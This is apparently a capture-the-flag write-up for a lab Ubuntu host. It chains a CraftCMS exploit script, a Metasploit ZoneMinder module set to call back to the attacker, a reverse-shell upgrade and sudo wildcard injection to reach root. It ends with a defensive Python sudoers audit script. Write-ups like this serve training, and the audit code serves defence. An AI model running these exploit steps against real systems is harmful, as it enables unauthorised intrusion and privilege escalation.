This is an Ubuntu machine running a web site built with a vulnerable version of CraftCMS (CVE-2023-41892). This can be exploited to get an initial shell, then move laterally to an SSH user with credentials found in the file system. To escalate privileges, we exploit a vulnerable ZoneMinder version (CVE-2023-26035) to move laterally to another user, then abuse an overly permissive sudo rule to get root.
> nmap $target -p- -T4 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-10 16:31 EST
Nmap scan report for 10.129.180.84
Host is up, received user-set (0.087s latency).
Not shown: 61282 closed tcp ports (conn-refused), 4251 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 31.20 seconds
Enumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-10 16:32 EST
Nmap scan report for 10.129.180.84
Host is up, received user-set (0.084s latency).
Scanned at 2023-12-10 16:33:00 EST for 10s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 96071cc6773e07a0cc6f2419744d570b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN+/g3FqMmVlkT3XCSMH/JtvGJDW3+PBxqJ+pURQey6GMjs7abbrEOCcVugczanWj1WNU5jsaYzlkCEZHlsHLvk=
| 256 0ba4c0cfe23b95aef6f5df7d0c88d6ce (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIm6HJTYy2teiiP6uZoSCHhsWHN+z3SVL/21fy6cZWZi
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 11.07 seconds
Add the host name to the hosts file and enumerate the web site with Firefox; it appears to be built with CraftCMS 4.4.14.
For the initial foothold, we'll focus on the CMS vulnerability.
To get the shell, just run the exploit with the host's URL and a www-data shell is returned.
> python3 exploit.py http://surveillance.htb
[-] Get temporary folder and document root ...
[-] Write payload to temporary file ...
[-] Trigger imagick to write shell ...
[-] Done, enjoy the shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Once inside the host, we find a MySQL backup in /var/www/html/craft/storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip. After unzipping it and dumping its contents, we find a hash for the admin user (matthew), which looks like SHA-256.
Forward the host's internal port 8080 to Kali port 8085 and browse to it with Firefox; a login portal appears. A ZoneMinder server is running on the host's port 8080.
Once installed, just start the framework, load the module and configure it properly. For this, remember that, with the local port forwarding in place, the victim's port 8080 is now reachable from Kali at http://localhost:8085.
use unix/webapp/zoneminder_snapshots
set rhosts 0.0.0.0
set rport 8085
set lhost <your IP here>
set targeturi /
set target 0
exploit
Once the meterpreter session is received, open a shell and find out it is running under the zoneminder user context.
This meterpreter shell is functional, but not interactive. The best option to upgrade the shell is to send an nc mkfifo reverse shell to Kali, then upgrade it to a TTY.
The resulting shell is interactive and can be used to do some enumeration in the ZoneMinder root directory /usr/share/zoneminder/www. From this location we launch a grep scan for clear-text passwords in the file system.
A database.php file is reported in /usr/share/zoneminder/www/api/app/Config/database.php containing MySQL credentials; however, there is nothing useful in the database.
Moving forward, the next step is to verify whether zoneminder has any sudo rights.
> sudo -l
Matching Defaults entries for zoneminder on surveillance:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User zoneminder may run the following commands on surveillance:
(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
This means this user can run any binary named zm*.pl in the /usr/bin/ directory under the root context, and no password will be prompted. Moreover, any option can be passed to the binary, since a wildcard has been inserted in the /etc/sudoers file. This is a wide open configuration which can be abused using wildcard injection.
Now just run any zm* binary and inject a command calling the exploit; it will be executed under the root context. For example, using zmupdate with the --version=1 option will force the tool to upgrade the database, and it allows us to inject a command.
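As an added defender-side example (not part of this writeup), a small Python checker that flags the three things that make the rule above abusable: a glob in the command path, a wildcard or no restriction on arguments, and NOPASSWD. The constructed SAMPLE puts the rule found here beside a tightened line that names one script and pins its arguments; that line is assumed only to illustrate what the check accepts, not a vetted ZoneMinder configuration.

```python
import re

# One sudoers user specification, e.g. the rule that "sudo -l" reported above:
#   zoneminder ALL=(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"  # user host=
    r"(?:\((?P<runas>[^)]*)\)\s*)?"                # (runas_user : runas_group)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"                  # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$"                               # comma-separated command list
)
GLOB_CHARS = re.compile(r"[*?\[]")

def audit_sudoers_line(line):
    """Return the findings for one sudoers line; an empty list means nothing was flagged."""
    line = line.split("#", 1)[0].strip()
    m = SPEC_RE.match(line) if line and not line.startswith("Defaults") else None
    if not m:
        return []
    findings = []
    for cmd in m.group("cmds").split(","):
        cmd = cmd.strip()
        path, _, args = cmd.partition(" ")
        if GLOB_CHARS.search(path):
            # sudo expands the path with glob(3): every matching file may be run
            findings.append(f"glob in command path: {path}")
        if args == "":
            # a command listed without arguments may be run with any arguments
            findings.append(f"unrestricted arguments: {path}")
        elif GLOB_CHARS.search(args):
            # '*' in the argument list also matches spaces, so options can be appended
            findings.append(f"wildcard in arguments: {cmd}")
    if findings and "NOPASSWD:" in m.group("tags"):
        findings.append("NOPASSWD: flagged rule runs without a password")
    return findings

def audit_sudoers(text):
    """Audit a whole sudoers file: {line_number: findings} for flagged lines only."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        if findings := audit_sudoers_line(line):
            report[n] = findings
    return report

# Constructed sample: the rule found on this box beside a tightened rewrite that names one
# script and pins its arguments (shown only to illustrate what the check accepts).
SAMPLE = """\
Defaults env_reset, use_pty
zoneminder ALL=(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
zoneminder ALL=(root) /usr/bin/zmupdate.pl --version=1
"""
```

Running audit_sudoers(SAMPLE) flags only line 2 of the sample, with one finding per problem in the rule.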